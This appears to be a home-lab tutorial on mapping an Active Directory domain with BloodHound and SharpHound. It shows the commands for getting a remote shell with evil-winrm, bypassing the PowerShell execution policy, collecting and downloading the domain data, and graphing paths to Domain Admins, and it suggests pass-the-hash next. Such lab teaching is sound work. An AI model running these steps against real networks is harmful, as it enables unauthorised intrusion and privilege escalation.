Bloodhound Overview

Bloodhound is a tool that is generally used by adversaries to visually map an organization’s Active Directory structure and analyze it to find its weaknesses. Being able to analyze the Active Directory is very useful to attackers to identify which objects are worth targeting in an organization. Any user within an active directory domain can interrogate their organization’s Active Directory which runs on the domain controllers.

Bloodhound uses the collector which is called as SharpHound to collect various kinds of data by running a ton of LDAP queries to collect information within Active Directory.

Grabbing Data with Bloodhound

• Download it form github -> link

• Download SharpHound.ps1 script on your kali machine
• To get shell will use evil-winrm tool

ruby evil-winrm.rb -i 192.168.1.2 -u superman -p 'Password123!'

• See menu

[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

• Upload SharpHound.ps1 script to machine

upload /home/kali/Desktop/AD/SharpHound.ps1

• bypass powershell policy and run script

PowerShell -ep bypass # bypass policy powershell

ls # to see the script
. .\SharpHound.ps1 # to run script

• Grabbing Data with Invoke-Bloodhound

Invoke-Bloodhound -CollectionMethod All -Domain Homelab.local -ZipFileName homelab.local.zip

• download file to local kali machine

download 20220823031653_homlab.local.zip

• check it after download it

next step install Bloodhound

 Bloodhound Setup

Install bloodhound

apt install bloodhound

config neo4j console

• after run command will get link to access console

sudo neo4j console

• defualt username and pass -> neo4j

• change password as you like -> my new pass kali

upload collection Data to Bloodhound

• Run neo4j console on one Tab

sudo neo4j console

• Run Bloodhound on onther Tab

Bloodhound 

• enter uername and new password

• upload collection file to Bloodhound

Graphing the collected data

Back on your BloodHound instance login and upload the hound.zip file via the up arrow to the right of the screen. Once imported click the 3 lines at the top left of the window to view the Database info. This shows you the AD info and relationships etc. we have three tab database , node info and Important one is Analysis

To Graph the data, go to the Analysis tab and choose what you would like to enumerate.

By clicking on a node you can bring up the properties of that node

Selecting “Find Shortest Paths to Domain Admins”. This shows the shortest route to get to Domain Administrator. We can see that ecartman, who is a domain administrator is logged into machine SOUTHPARK.PWNME.LOCAL so this would be a perfect target to maybe try passing a hash and using Token Impersonation to login to the Domain Controller etc.

To further demonstrate the power of Blood hound, this is a result of selecting Shortest Paths to High Value Targets. This is a lab with less than 10 users and computers. Imagine a coorperate network with hundreds… This post has shown a very small fraction of what BloodHound is capable of.

reference

• https://medium.com/securonix-tech-blog/detecting-ldap-enumeration-and-bloodhound-s-sharphound-collector-using-active-directory-decoys-dfc840f2f644
• https://swepstopia.com/bloodhound-enumeration/